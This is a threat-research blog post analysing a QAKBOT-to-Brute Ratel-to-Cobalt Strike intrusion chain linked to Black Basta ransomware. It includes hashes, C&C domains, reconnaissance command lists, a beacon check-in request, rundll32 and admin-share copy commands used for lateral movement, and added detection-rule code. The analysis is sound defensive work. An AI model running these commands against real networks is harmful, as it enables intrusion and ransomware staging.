URL: https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html
BLACK BASTA RANSOMWARE GANG INFILTRATES NETWORKS VIA QAKBOT, BRUTE RATEL, AND
COBALT STRIKE

We analyzed a QAKBOT-related case leading to a Brute Ratel C4 and Cobalt Strike
payload that can be attributed to the threat actors behind the Black Basta
ransomware.

By: Ian Kenefick, Lucas Silva, Nicole Hernandez October 12, 2022 Read time: 10
min (2565 words)



SUMMARY

QAKBOT malware distribution resumed on September 8, 2022, following a brief
hiatus; on that date our researchers spotted several distribution mechanisms.
The distribution methods observed included SmokeLoader (using the ‘snow0x’
distributor ID), Emotet (using the ‘azd’ distributor ID), and malicious spam
that used the ‘BB’ and ‘Obama20x’ IDs.

A recent case involving the QAKBOT ‘BB’ distributor led to the deployment of
Brute Ratel (detected by Trend Micro as Backdoor.Win64.BRUTEL) —  a framework
similar to Cobalt Strike — as a second-stage payload. This is a noteworthy
development because it is the first time we have observed Brute Ratel as a
second-stage payload via a QAKBOT infection. The attack also involved the use of
Cobalt Strike itself for lateral movement. We attribute these activities to the
threat actors behind the Black Basta ransomware.

Intrusion timeline

Figure 1. The intrusion timeline for the attack


THE RISE OF BRUTE RATEL AND OTHER C&C FRAMEWORKS

Brute Ratel is a commercial (paid) Adversary Emulation framework and a relative
newcomer to the commercial C&C Framework space, where it competes with more
established players such as Cobalt Strike.

Adversary Emulation frameworks like Brute Ratel and Cobalt Strike are marketed
to penetration testing professionals (Red Teams) for use in legitimate
penetration testing activities in which organizations seek to improve their
ability to detect and respond to real cyberattacks. These frameworks are used to
provide hands-on keyboard access from remote locations to emulate the tactics,
techniques, and procedures (TTPs) used by attackers in network intrusions.

On top of Cobalt Strike’s legitimate use cases, it has gained notoriety for its
illicit usage and near omnipresence in high-profile, human-operated ransomware
attacks during the past few years. It serves as a common second-stage payload
from Botnets such as QAKBOT (TrojanSpy.Win64.QAKBOT), IcedID
(TrojanSpy.Win64.ICEDID), Emotet (TrojanSpy.Win64.EMOTET), and Bumblebee
(Trojan.Win64.BUMBLELOADER), among others. Unfortunately, several versions of
Cobalt Strike have been leaked over the past couple of years, accelerating its
malicious use by cybercriminals.

Because Cobalt Strike is far more widely used than Brute Ratel, its detection
coverage is also far greater. This makes Brute Ratel and other less established
C&C frameworks an increasingly attractive option for malicious actors, whose
activities may remain undetected for a longer period.

Brute Ratel has recently attracted greater interest from threat actors in the
cybercriminal underground, where versions of the framework are actively traded
and cracked versions circulated. It is unknown how Brute Ratel was initially
leaked, but its developers have acknowledged the leak on Twitter.

QAKBOT ‘BB’ to Brute Ratel

Figure 2. A summary of the campaign’s procedure

The campaign commences with a spam email containing a newly created malicious
URL sent to potential victims. The URL’s landing page presents the recipient
with a password for a ZIP file.

Figure 3. Notification that the ZIP file has been downloaded, along with the
password to the file


SANDBOX AND SECURITY SOLUTION EVASION

The use of password-protected ZIP files at this stage is likely an attempt to
evade analysis by security solutions.


MARK OF THE WEB EVASION

The ZIP file contains a single .ISO file. The use of an ISO file is an attempt
to defeat the “Mark of the Web (MOTW),” which tags files as having been
downloaded from the internet; MOTW-tagged files are subjected to additional
security measures by Windows and endpoint security solutions.

The ISO file contains a visible LNK file that uses the “Explorer” icon and two
hidden subdirectories, each containing various files and directories. By
default, Windows does not display hidden files to the user. Figure 4
illustrates what the user sees when the “Show hidden files” setting is enabled.

Figure 4. The additional hidden subdirectories that the user sees when the
“Show hidden files” setting is enabled

The directory structure is as follows:

Figure 5. Directory structure

File Name | Description | Detection Name | SHA-256
Accounting#7405.iso | - | Trojan.Win32.QAKBOT.YACIW | 582a5e2b2652284ebb486bf6a367aaa6bb817c856f08ef54db64c6994c5b91bd
Contract.lnk | LNK file | Trojan.LNK.QAKBOT.YACIW | e9e214f7338c6baefd2a76ee66f5fadb0b504718ea3cebc65da7a43a5ff819a4
fodder.txt | Decoy text file | - | 4dcf06a5afc699bbb73650cefe4ad86a1b686a257c607e0b96dda85d69544d8a
enunciatedNaught.cmd | Malicious CMD file | Trojan.BAT.QAKBOT.YACIW | d44b05b248f95986211ab3dc2765f1d76683594a174984c8b801bd7eade8aa47
eyelid.png | Decoy PNG file | - | dd755395b36acfceaa0d7e9c5479df4b1c919d57837fe43068980c5fa7dd6875
reflectiveness.db | QAKBOT DLL | Trojan.Win32.QAKBOT.YACIW | 01fd6e0c8393a5f4112ea19a26bedffb31d6a01f4d3fe5721ca20f479766208f
sharpOutvotes.js | Malicious JS file | Trojan.JS.QAKBOT.YACIW | 06c4c4d100e9a7c79e2ee8c4ffa1f7ad165a014f5f14f90ddfc730527c564e35

Table 1. The file names, detection names, and hashes for the indicators used in
the initial part of the infection routine


COMMAND-LINE INTERFACE - EXECUTION SEQUENCE


QAKBOT uses obfuscation across two script files, a JavaScript (.js) file and a
batch script (.cmd) file, likely in an effort to conceal suspicious-looking
command lines.

Figure 6. The execution sequence for the command line interface 


INITIAL QAKBOT C&C SERVER COMMUNICATION

The C&C Infrastructure is geographically distributed across compromised hosts
residing in predominantly residential Internet Service Provider (ISP) broadband
networks.

The C&C servers observed reside in the following countries:

 * Afghanistan
 * Algeria
 * Argentina
 * Austria
 * Brazil
 * Bulgaria
 * Canada
 * Chile
 * Colombia
 * Egypt
 * India
 * Indonesia
 * Japan
 * Mexico
 * Mongolia
 * Morocco
 * Netherlands
 * Qatar
 * Russia
 * South Africa
 * Taiwan
 * Thailand
 * Turkey
 * United Arab Emirates
 * United Kingdom
 * United States
 * Vietnam
 * Yemen

These ‘Tier 1’ C&C Servers are considered disposable by the QAKBOT operators and
are replaced frequently (nearly every time there is a new distribution of the
malware), though some persist across multiple QAKBOT malware configurations.


Automated reconnaissance commands


Just six minutes after the initial C&C communication, with the QAKBOT malware
now running inside an injected process (wermgr.exe), automated reconnaissance
of the infected environment is performed by executing multiple built-in
command-line tools. The command lines are executed in the following order:

Order | Process | Command Line
1 | C:\Windows\SysWOW64\net.exe | net view
2 | C:\Windows\SysWOW64\ARP.EXE | arp -a
3 | C:\Windows\SysWOW64\ipconfig.exe | ipconfig /all
4 | C:\Windows\SysWOW64\nslookup.exe | nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.<domain_fqdn>
5 | C:\Windows\SysWOW64\net.exe | net share
6 | C:\Windows\SysWOW64\ROUTE.EXE | route print
7 | C:\Windows\SysWOW64\NETSTAT.EXE | netstat -nao
8 | C:\Windows\SysWOW64\net.exe | net localgroup
9 | C:\Windows\SysWOW64\whoami.exe | whoami /all

Table 2. The order of execution for the built-in command lines

This activity is visible in Trend Micro Vision One™, which detects the
suspicious usage of these built-in Windows commands.

Figure 7. Trend Micro Vision One showing the activities associated with
wermgr.exe


QAKBOT DROPS BRUTE RATEL

Five minutes after the automated reconnaissance activities are completed, the
QAKBOT-injected wermgr.exe process drops the Brute Ratel DLL and invokes it via
a rundll32.exe child process with the “main” export function.

Figure 8. Trend Micro Vision One showing Brute Ratel being invoked by wermgr.exe
via the rundll32.exe process

The backdoor communicates over HTTPS, performing a check-in with the Brute
Ratel server at symantecuptimehost[.]com:

POST hxxps://symantecuptimehost[.]com:8080/admin.php?login= HTTP/1.1
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Host: symantecuptimehost[.]com:8080
Content-Length: 122
Cache-Control: no-cache

Figure 9. The Brute Ratel check-in
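As an added example (not code from the original post), the following parser takes a raw HTTP request such as the check-in above and reports which of its traits are present, so that a proxy or NDR analyst can score similar requests. The benign login request is constructed; the check-in text is the one quoted above, defanged as printed.

```python
# Added example (not from the original post): parse a raw HTTP request and report
# which traits of the Figure 9 Brute Ratel check-in it shares. The benign request
# below is constructed; the check-in text is the one quoted in the write-up.
from urllib.parse import parse_qs

CHECKIN_PATH = "/admin.php"   # path used by the check-in in the write-up
CHECKIN_PORT = "8080"         # non-standard HTTPS port seen in the Host header
MIN_TRAITS = 3                # traits that must line up before a request is flagged


def parse_request(raw):
    """Split a raw HTTP/1.1 request (request line plus headers) into parts."""
    head = raw.strip().replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")   # first colon only; values may contain ':'
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers}


def split_target(target):
    """Return (path, query) from a bare path or a full (possibly defanged) URL."""
    if "://" in target:
        rest = target.split("://", 1)[1]
        target = rest[rest.find("/"):] if "/" in rest else "/"
    path, _, query = target.partition("?")
    return path, query


def checkin_traits(req):
    """List the check-in traits present in a parsed request, in a fixed order."""
    traits = []
    path, query = split_target(req["target"])
    qs = parse_qs(query, keep_blank_values=True)   # keep 'login=' with an empty value
    headers = req["headers"]
    if req["method"] == "POST" and path.endswith(CHECKIN_PATH):
        traits.append("post_to_admin_php")
    if qs.get("login") == [""]:
        traits.append("empty_login_parameter")
    if headers.get("content-type", "").lower().startswith("application/json"):
        traits.append("json_body")
    if headers.get("host", "").endswith(":" + CHECKIN_PORT):
        traits.append("port_" + CHECKIN_PORT)
    if headers.get("cache-control", "").lower() == "no-cache":
        traits.append("no_cache")
    return traits


def is_suspected_checkin(raw):
    """True when at least MIN_TRAITS traits line up; no single trait is enough alone."""
    return len(checkin_traits(parse_request(raw))) >= MIN_TRAITS


# The check-in from Figure 9, defanged exactly as the write-up prints it.
BRUTE_RATEL_CHECKIN = """POST hxxps://symantecuptimehost[.]com:8080/admin.php?login= HTTP/1.1
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Host: symantecuptimehost[.]com:8080
Content-Length: 122
Cache-Control: no-cache
"""

# Constructed: an ordinary JSON login request to an internal web application.
BENIGN_LOGIN = """POST /api/session HTTP/1.1
Content-Type: application/json
Host: intranet.example.internal
Content-Length: 58
"""
```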

Further reconnaissance is performed in the environment to identify privileged
users. First, the built-in net.exe and nltest.exe are used.

Order | Process | Command Line
1 | C:\Windows\SysWOW64\net.exe | net group "Domain Admins" /domain
2 | C:\Windows\SysWOW64\net.exe | net group "Domain Controllers" /domain
3 | C:\Windows\SysWOW64\nltest.exe | nltest /domain_trusts /all_trusts
4 | C:\Windows\SysWOW64\net.exe | net user <redacted> /domain

Table 3. Reconnaissance processes to identify privileged users

Second, the SharpHound utility is run via Brute Ratel in an injected svchost.exe
process to produce the JSON files that BloodHound ingests (describing the Active
Directory organisational units, group policies, domains, user groups, computers,
and users). The files are then packed into a ZIP file in preparation for
exfiltration. The entire process is scripted and takes less than two seconds to
complete.


Figure 10. Outputting JSON files via svchost.exe


BRUTE RATEL DROPS COBALT STRIKE

Interestingly, the actors chose to leverage Cobalt Strike for lateral movement.
The first of several beacon files is dropped onto the same infected endpoint
running Brute Ratel C4:

 * C:\Users\Public\Name-123456.xls

This beacon file is executed on the host running Brute Ratel C4 using the
following command:

 * rundll32 C:\users\public\Name-123456.xls,DllRegisterServer

The actor drops the other beacon files and copies them to administrative shares
on other hosts on the network, again using filenames with an XLS extension:

 * C:\Users\Public\abcabc.xls
 * C:\Users\Public\abc-1234.xls
 * C:\Users\Public\Orders_12_34_56.xls
 * C:\Users\Public\MkDir.xls

The commands used to copy the files are as follows:

C:\WINDOWS\system32\cmd.exe /C copy C:\users\public\fksro.xls
\\<HOST>\C$\users\public\abcabc.xls
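The reconnaissance burst from the injected wermgr.exe (Tables 2 and 3) and the lateral-movement steps above (rundll32 loading an “.xls” via DllRegisterServer, cmd.exe copying beacons into C$ shares) are all visible in process-creation telemetry. The following detection rules are an added example, not code from the original post: the event schema, host names, domain and timestamps are constructed, and the thresholds are assumptions to tune per environment.

```python
# Added example (not from the original post): process-event detection rules for
# three behaviours the write-up describes. Event fields and sample events are constructed.
from collections import defaultdict
from datetime import datetime, timedelta
import re

# Built-in discovery commands from Table 2 and Table 3 (normalized form).
RECON_CMDS = {
    "net view", "arp -a", "ipconfig /all", "net share", "route print",
    "netstat -nao", "net localgroup", "whoami /all",
    'net group "domain admins" /domain', 'net group "domain controllers" /domain',
    "nltest /domain_trusts /all_trusts",
}
RECON_PREFIXES = ("nslookup -querytype=all",)  # tail varies (domain, timeout)
RECON_MIN_DISTINCT = 4                 # assumed threshold: distinct commands to fire
RECON_WINDOW = timedelta(minutes=10)   # assumed window; the write-up's burst was faster

# rundll32 calling DllRegisterServer on a file carrying a spreadsheet extension.
XLS_DLLREG = re.compile(r"\.xls\s*,\s*dllregisterserver\b", re.I)
# cmd.exe copying a file into a remote C$ or ADMIN$ share.
ADMIN_SHARE_COPY = re.compile(r"\bcopy\b.*\\\\[^\\\s]+\\(?:c|admin)\$\\", re.I)


def normalize(cmdline):
    """Lower-case and collapse whitespace so spacing variants still match."""
    return re.sub(r"\s+", " ", cmdline.strip()).lower()


def classify_recon(cmdline):
    """Return the canonical discovery command if cmdline is one, else None."""
    norm = normalize(cmdline)
    if norm in RECON_CMDS:
        return norm
    return next((p for p in RECON_PREFIXES if norm.startswith(p)), None)


def detect_recon_burst(events):
    """Fire once per (host, parent image) when RECON_MIN_DISTINCT or more distinct
    discovery commands run within RECON_WINDOW of each other."""
    groups = defaultdict(list)
    for ev in events:
        cmd = classify_recon(ev["cmdline"])
        if cmd:
            groups[(ev["host"], ev["parent"].lower())].append((ev["ts"], cmd))
    alerts = []
    for (host, parent), hits in groups.items():
        hits.sort()
        best = 0
        for i, (start, _) in enumerate(hits):  # slide the window over each start
            best = max(best, len({c for t, c in hits[i:] if t - start <= RECON_WINDOW}))
        if best >= RECON_MIN_DISTINCT:
            alerts.append({"rule": "recon_burst", "host": host, "parent": parent, "distinct": best})
    return alerts


def is_xls_dllregisterserver(ev):
    return ev["image"].lower().endswith("rundll32.exe") and bool(XLS_DLLREG.search(ev["cmdline"]))


def is_admin_share_copy(ev):
    return ev["image"].lower().endswith("cmd.exe") and bool(ADMIN_SHARE_COPY.search(ev["cmdline"]))


def run_rules(events):
    """Run all three rules over a list of process-creation events."""
    alerts = detect_recon_burst(events)
    for ev in events:
        if is_xls_dllregisterserver(ev):
            alerts.append({"rule": "xls_dllregisterserver", "host": ev["host"], "cmdline": ev["cmdline"]})
        if is_admin_share_copy(ev):
            alerts.append({"rule": "admin_share_copy", "host": ev["host"], "cmdline": ev["cmdline"]})
    return alerts


# Constructed sample telemetry (host names, domain and timestamps are made up).
T0 = datetime(2022, 9, 8, 10, 6, 0)

def _ev(offset_s, host, parent, image, cmdline):
    return {"ts": T0 + timedelta(seconds=offset_s), "host": host,
            "parent": parent, "image": image, "cmdline": cmdline}

SAMPLE_EVENTS = [
    # Part of the Table 2 burst from the injected wermgr.exe on HOST-A.
    _ev(0, "HOST-A", "wermgr.exe", r"C:\Windows\SysWOW64\net.exe", "net view"),
    _ev(2, "HOST-A", "wermgr.exe", r"C:\Windows\SysWOW64\ARP.EXE", "arp -a"),
    _ev(4, "HOST-A", "wermgr.exe", r"C:\Windows\SysWOW64\ipconfig.exe", "ipconfig /all"),
    _ev(6, "HOST-A", "wermgr.exe", r"C:\Windows\SysWOW64\nslookup.exe",
        "nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.corp.example"),
    _ev(8, "HOST-A", "wermgr.exe", r"C:\Windows\SysWOW64\net.exe", "net share"),
    _ev(10, "HOST-A", "wermgr.exe", r"C:\Windows\SysWOW64\whoami.exe", "whoami /all"),
    # One discovery command typed by an admin on HOST-B: below threshold, no alert.
    _ev(30, "HOST-B", "explorer.exe", r"C:\Windows\System32\ipconfig.exe", "ipconfig /all"),
    # Beacon with an .xls name loaded through DllRegisterServer.
    _ev(600, "HOST-A", "svchost.exe", r"C:\Windows\System32\rundll32.exe",
        r"rundll32 C:\users\public\Name-123456.xls,DllRegisterServer"),
    # Beacon copied to another host's C$ share.
    _ev(700, "HOST-A", "svchost.exe", r"C:\WINDOWS\system32\cmd.exe",
        r"C:\WINDOWS\system32\cmd.exe /C copy C:\users\public\fksro.xls \\HOST-C\C$\users\public\abcabc.xls"),
    # Ordinary copy to a departmental share: must not fire.
    _ev(800, "HOST-B", "explorer.exe", r"C:\WINDOWS\system32\cmd.exe",
        r"cmd.exe /C copy report.xlsx \\FILESRV\Finance\report.xlsx"),
]
```

`run_rules(SAMPLE_EVENTS)` returns one recon_burst alert for HOST-A (six distinct commands under wermgr.exe) plus one alert each for the rundll32 and C$ copy events; the HOST-B events produce nothing.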

The beacon C&C servers are:

 * hxxps://fewifasoc[.]com | 45.153.242[.]251
 * hxxps://hadujaza[.]com | 45.153.241[.]88
 * hxxps://himiketiv[.]com | 45.153.241[.]64

The threat actors were then evicted from the environment before any final
actions could be taken. We assess based on the level of access and discovery
activity that the likely final actions would have been a domain-wide ransom
deployment.

QAKBOT ‘Obama’ to Brute Ratel


In another, more recent incident, Trend Micro Research spotted QAKBOT using the
“Obama” distributor ID prefix (i.e. “Obama208”), also dropping Brute Ratel C4 as
a second-stage payload.

In this case, the malware arrives as a password-protected ZIP file delivered via
HTML smuggling, which allows the attacker to “smuggle” an encoded malicious
script into an HTML attachment or web page. Once the user opens the HTML page in
the browser, the script is decoded and the payload is assembled. 

Figure 11. QAKBOT distributors use password protection to defeat network and
sandbox security scans

Once the ZIP file is decrypted using the password provided in the HTML
attachment, the user is presented with an ISO file. The malicious files are
contained in the ISO file, which is used as a Mark of the Web bypass. The ISO
file has the following directory structure:

Figure 12. ISO file directory structure

Since QAKBOT’s return, we have observed multiple variations in the execution
chain, from scripting languages to file extensions and the use of export
function names and ordinals. For this infection, the following variation was
used:

Figure 13. The variation used for the infection

The infection plays out with the same TTPs (Tactics, Techniques, and Procedures)
described in the first kill chain in this blog. However, one notable difference
was observed in the C&C configuration, which used DNS over HTTPS (DoH) instead
of a more traditional HTTPS C&C channel. The C&C servers observed used HTTPS
with Let’s Encrypt certificates.

By using DoH, attackers can hide DNS queries for C&C domains. If SSL/TLS
traffic is not being inspected using man-in-the-middle (MitM) techniques, DNS
queries for the C&C server will therefore go unnoticed.


Figure 14. Brute Ratel Process performing C&C Communication via DNS over HTTPS
(DoH). The threat was contained before any final actions could be taken.


LINKS TO THE BLACK BASTA RANSOMWARE

 

Figure 15. Brute Ratel and Cobalt Strike infrastructure used in QAKBOT to Black
Basta intrusions

Based on our investigations, we can confirm that the QAKBOT-to-Brute
Ratel-to-Cobalt Strike kill chain is associated with the group behind the Black
Basta Ransomware. This is based on overlapping TTPs and infrastructure observed
in Black Basta attacks. It is not the first time that we have observed
intrusions via QAKBOT leading to Black Basta.


CONCLUSION AND SECURITY RECOMMENDATIONS

Users can thwart new QAKBOT variants and other threats that spread through
emails by following some of these best practices:

 * Verify the email sender and content before downloading attachments or
   selecting embedded links from emails.
 * Hover the pointer above embedded links to show the link’s target.
 * Check the sender’s identity. Unfamiliar email addresses, mismatched email and
   sender names, and spoofed company emails are some of the signs that the
   sender has malicious intent.
 * If the email claims to come from a legitimate company, verify that they
   actually sent it before taking any action.

Organizations should take note of the trending use of Cobalt Strike in attacks,
living-off-the-land binaries (LOLBins), and red team or penetration-testing
tools such as Brute Ratel C4, which attackers use to blend in with the
environment.

Users can also protect systems through managed detection and response (MDR),
which utilizes advanced artificial intelligence to correlate and prioritize
threats, determining if they are part of a larger attack. It can detect threats
before they are executed, thus preventing further compromise.

The constant resurgence of new, more sophisticated variants of known malware, as
well as the emergence of entirely unknown threats, demand solutions with
advanced detection and response capabilities such as Trend Micro Vision One, a
technology that can provide powerful XDR capabilities that collect and
automatically correlate data across multiple security layers — from email and
endpoints to servers, cloud workloads, and networks. Trend Micro Vision One can
prevent attacks via automated protection, while also ensuring that no
significant incidents go unnoticed.


TACTICS, TECHNIQUES, AND PROCEDURES (TTPS)

Tactic / Technique | Notes

TA0001 Initial Access
T1566.001 Phishing: Spearphishing Attachment | Victims receive spear-phishing emails with attached malicious ZIP files (typically password-protected) or HTML files. That file contains an ISO file.
T1566.002 Phishing: Spearphishing Link | QAKBOT has spread through emails with newly created malicious links.

TA0002 Execution
T1204.001 User Execution: Malicious Link | QAKBOT has gained execution through users accessing a malicious link.
T1204.002 User Execution: Malicious File | QAKBOT has gained execution through users opening malicious attachments.
T1569.002 System Services: Service Execution | Cobalt Strike can use PsExec to execute a payload on a remote host. It can also use the Service Control Manager to start new services.
T1059.005 Command and Scripting Interpreter: Visual Basic Script | QAKBOT can use VBS to download and execute malicious files.
T1059.007 Command and Scripting Interpreter: JavaScript | QAKBOT abuses WScript to execute a JScript file.

TA0003 Persistence
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | QAKBOT can maintain persistence by creating an auto-run Registry key.

TA0004 Privilege Escalation
T1055 Process Injection | QAKBOT can inject itself into processes such as wermgr.exe.

TA0005 Defense Evasion
T1027.006 Obfuscated Files or Information: HTML Smuggling | Smuggles a file’s content by hiding malicious payloads inside seemingly benign HTML files.
T1218.010 System Binary Proxy Execution: Regsvr32 | QAKBOT can use Regsvr32 to execute malicious DLLs. Cobalt Strike can use rundll32.exe to load a DLL from the command line.
T1140 Deobfuscate/Decode Files or Information | The initial QAKBOT .zip file bypasses some antivirus detections because it is password-protected.
T1562.009 Impair Defenses: Safe Boot Mode | Black Basta uses bcdedit to boot the device in safe mode.

TA0007 Discovery
T1010 Application Window Discovery | QAKBOT can enumerate windows on a compromised host.
T1482 Domain Trust Discovery | QAKBOT can run nltest /domain_trusts /all_trusts for domain trust discovery.
T1135 Network Share Discovery | QAKBOT can use net share to identify network shares for use in lateral movement.
T1069.001 Permission Groups Discovery: Local Groups | QAKBOT can use net localgroup to discover local groups.
T1057 Process Discovery | QAKBOT has the ability to check running processes.
T1018 Remote System Discovery | QAKBOT can identify remote systems through the net view command.
T1082 System Information Discovery | QAKBOT can collect system information, including the OS version and domain, on a compromised host.
T1016 System Network Configuration Discovery | QAKBOT can use net config workstation, arp -a, and ipconfig /all to gather network configuration information.
T1049 System Network Connections Discovery | QAKBOT can use netstat to enumerate current network connections.
T1033 System Owner/User Discovery | QAKBOT can identify the username on a compromised system.

TA0008 Lateral Movement
T1021.002 Remote Services: SMB/Windows Admin Shares | Cobalt Strike can use Windows admin shares (C$ and ADMIN$) for lateral movement.

TA0011 Command and Control
T1071.001 Application Layer Protocol: Web Protocols | QAKBOT can use HTTP and HTTPS in communication with the C&C servers.
T1573 Encrypted Channel | Used by QAKBOT, BRUTEL, and Cobalt Strike.

TA0040 Impact
T1486 Data Encrypted for Impact | Black Basta uses the ChaCha20 algorithm to encrypt files. The ChaCha20 encryption key is then encrypted with a public RSA-4096 key that is included in the executable.
T1489 Service Stop | Uses sc stop and taskkill to stop services.
T1490 Inhibit System Recovery | Black Basta deletes Volume Shadow Copies using the vssadmin tool.
T1491 Defacement | Replaces the desktop wallpaper to display the ransom note.


INDICATORS OF COMPROMISE

The indicators of compromise for this entry can be found here.

Tags
Malware | Research | Network | Articles, News, Reports | Cyber Threats


AUTHORS

 * Ian Kenefick
   
   Threats Analyst

 * Lucas Silva
   
   Incident Response Analyst

 * Nicole Hernandez
   
   Threats Analyst

Copyright © 2022 Trend Micro Incorporated. All rights reserved.
Consortium’s (W3C) Web Content Accessibility Guidelines 2.1 (WCAG 2.1) at the AA
level. These guidelines explain how to make web content accessible to people
with a wide array of disabilities. Complying with those guidelines helps us
ensure that the website is accessible to blind people, people with motor
impairments, visual impairment, cognitive disabilities, and more.

This website utilizes various technologies that are meant to make it as
accessible as possible at all times. We utilize an accessibility interface that
allows persons with specific disabilities to adjust the website’s UI (user
interface) and design it to their personal needs.

Additionally, the website utilizes an AI-based application that runs in the
background and optimizes its accessibility level constantly. This application
remediates the website’s HTML, adapts its functionality and behavior for
screen-readers used by blind users, and for keyboard functions used by
individuals with motor impairments.

If you wish to contact the website’s owner please use the website's form

Screen-reader and keyboard navigation

Our website implements the ARIA attributes (Accessible Rich Internet
Applications) technique, alongside various behavioral changes, to ensure blind
users visiting with screen-readers can read, comprehend, and enjoy the website’s
functions. As soon as a user with a screen-reader enters your site, they
immediately receive a prompt to enter the Screen-Reader Profile so they can
browse and operate your site effectively. Here’s how our website covers some of
the most important screen-reader requirements:

 1. Screen-reader optimization: we run a process that learns the website’s
    components from top to bottom, to ensure ongoing compliance even when
    updating the website. In this process, we provide screen-readers with
    meaningful data using the ARIA set of attributes. For example, we provide
    accurate form labels; descriptions for actionable icons (social media icons,
    search icons, cart icons, etc.); validation guidance for form inputs;
    element roles such as buttons, menus, modal dialogues (popups), and others. 
    
    Additionally, the background process scans all of the website’s images. It
    provides an accurate and meaningful image-object-recognition-based
    description as an ALT (alternate text) tag for images that are not
    described. It will also extract texts embedded within the image using an OCR
    (optical character recognition) technology. To turn on screen-reader
    adjustments at any time, users need only to press the Alt+1 keyboard
    combination. Screen-reader users also get automatic announcements to turn
    the Screen-reader mode on as soon as they enter the website.
    
    These adjustments are compatible with popular screen readers such as JAWS,
    NVDA, VoiceOver, and TalkBack.
    
    
 2. Keyboard navigation optimization: The background process also adjusts the
    website’s HTML and adds various behaviors using JavaScript code to make the
    website operable by the keyboard. This includes the ability to navigate the
    website using the Tab and Shift+Tab keys, operate dropdowns with the arrow
    keys, close them with Esc, trigger buttons and links using the Enter key,
    navigate between radio and checkbox elements using the arrow keys, and fill
    them in with the Spacebar or Enter key.
    
    Additionally, keyboard users will find content-skip menus available at any
    time by clicking Alt+2, or as the first element of the site while navigating
    with the keyboard. The background process also handles triggered popups by
    moving the keyboard focus towards them as soon as they appear, not allowing
    the focus to drift outside.
    
    Users can also use shortcuts such as “M” (menus), “H” (headings), “F”
    (forms), “B” (buttons), and “G” (graphics) to jump to specific elements.

Disability profiles supported on our website
 * Epilepsy Safe Profile: this profile enables people with epilepsy to safely
   use the website by eliminating the risk of seizures resulting from flashing
   or blinking animations and risky color combinations.
 * Vision Impaired Profile: this profile adjusts the website so that it is
   accessible to the majority of visual impairments such as Degrading Eyesight,
   Tunnel Vision, Cataract, Glaucoma, and others.
 * Cognitive Disability Profile: this profile provides various assistive
   features to help users with cognitive disabilities such as Autism, Dyslexia,
   CVA, and others, to focus on the essential elements more easily.
 * ADHD Friendly Profile: this profile significantly reduces distractions and
   noise to help people with ADHD, and Neurodevelopmental disorders browse,
   read, and focus on the essential elements more easily.
 * Blind Users Profile (Screen-readers): this profile adjusts the website to be
   compatible with screen-readers such as JAWS, NVDA, VoiceOver, and TalkBack. A
   screen-reader is installed on the blind user’s computer, and this site is
   compatible with it.
 * Keyboard Navigation Profile (Motor-Impaired): this profile enables
   motor-impaired persons to operate the website using the keyboard Tab,
   Shift+Tab, and the Enter keys. Users can also use shortcuts such as “M”
   (menus), “H” (headings), “F” (forms), “B” (buttons), and “G” (graphics) to
   jump to specific elements.

Additional UI, design, and readability adjustments
 1. Font adjustments – users can increase and decrease its size, change its
    family (type), adjust the spacing, alignment, line height, and more.
 2. Color adjustments – users can select various color contrast profiles such as
    light, dark, inverted, and monochrome. Additionally, users can swap color
    schemes of titles, texts, and backgrounds with over seven different coloring
    options.
 3. Animations – epileptic users can stop all running animations with the click
    of a button. Animations controlled by the interface include videos, GIFs,
    and CSS flashing transitions.
 4. Content highlighting – users can choose to emphasize essential elements such
    as links and titles. They can also choose to highlight focused or hovered
    elements only.
 5. Audio muting – users with hearing devices may experience headaches or other
    issues due to automatic audio playing. This option lets users mute the
    entire website instantly.
 6. Cognitive disorders – we utilize a search engine linked to Wikipedia and
    Wiktionary, allowing people with cognitive disorders to decipher meanings of
    phrases, initials, slang, and others.
 7. Additional functions – we allow users to change cursor color and size, use a
    printing mode, enable a virtual keyboard, and many other functions.

Assistive technology and browser compatibility

We aim to support as many browsers and assistive technologies as possible, so
our users can choose the best fitting tools for them, with as few limitations as
possible. Therefore, we have worked very hard to be able to support all major
systems that comprise over 95% of the user market share, including Google
Chrome, Mozilla Firefox, Apple Safari, Opera and Microsoft Edge, JAWS, and NVDA
(screen readers), both for Windows and MAC users.

Notes, comments, and feedback

Despite our very best efforts to allow anybody to adjust the website to their
needs, there may still be pages or sections that are not fully accessible, are
in the process of becoming accessible, or are lacking an adequate technological
solution to make them accessible. Still, we are continually improving our
accessibility, adding, updating, improving its options and features, and
developing and adopting new technologies. All this is meant to reach the optimal
level of accessibility following technological advancements. If you wish to
contact the website’s owner, please use the website's form

Hide Accessibility Interface? Please note: If you choose to hide the
accessibility interface, you won't be able to see it anymore, unless you clear
your browsing history and data. Are you sure that you wish to hide the
interface?
Accept Cancel

Continue



Processing the data, please give it a few seconds...


AddThis Sharing Sidebar
Share to FacebookFacebookShare to TwitterTwitterShare to PrintPrintMore AddThis
Share optionsAddThis
41
SHARES
Hide
Show
Close
AddThis